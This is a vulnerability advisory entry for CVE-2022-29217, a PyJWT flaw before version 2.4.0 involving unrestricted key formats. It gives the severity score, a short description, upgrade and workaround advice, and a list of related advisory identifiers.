CVE-2022-29217

CVSS v2.0

7.8

High

Vector

AV:N/AC:L/Au:N/C:N/I:C/A:N

Name of the Vulnerable Software and Affected Versions PyJWT versions prior to 2.4.0

Description The issue is related to the implementation of JWT in Python PyJWT, where an attacker can exploit the lack of restrictions on certain open key formats. This allows a remote attacker to impact the integrity of data. The PyJWT library supports multiple JWT signing algorithms, and the application must specify which algorithms are supported. If the application uses jwt.algorithms.get default algorithms(), it may be vulnerable to attacks. The estimated number of potentially affected devices is not specified.

Recommendations For versions prior to 2.4.0, upgrade to v2.4.0 to receive a patch for this issue. As a temporary workaround, always be explicit with the algorithms that are accepted and expected when decoding.

Exploit

Fix

Use of a Broken Cryptographic Algorithm

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-327

Related Identifiers

AZL-9852

BDU:2023-07829

CVE-2022-29217

GHSA-FFQJ-6FQR-9H24

MGASA-2022-0244

OESA-2022-1710

OPENSUSE-SU-2022_2402-1

OPENSUSE-SU-2024:12139-1

OPENSUSE-SU-2025:14987-1

PYSEC-2022-202

SUSE-SU-2022:2401-1

SUSE-SU-2022:2402-1

SUSE-SU-2022:2403-1

SUSE-SU-2022:3545-1

SUSE-SU-2022_2401-1

SUSE-SU-2022_2402-1

SUSE-SU-2022_2403-1

SUSE-SU-2022_3545-1

SUSE-SU-2023:0794-1

SUSE-SU-2023_0794-1

USN-5526-1

USN-5526-2

Affected Products

Linuxmint

Pyjwt

Red Os

Suse

Ubuntu

CVE-2022-29217

Weakness Enumeration

Related Identifiers

Affected Products

References · 57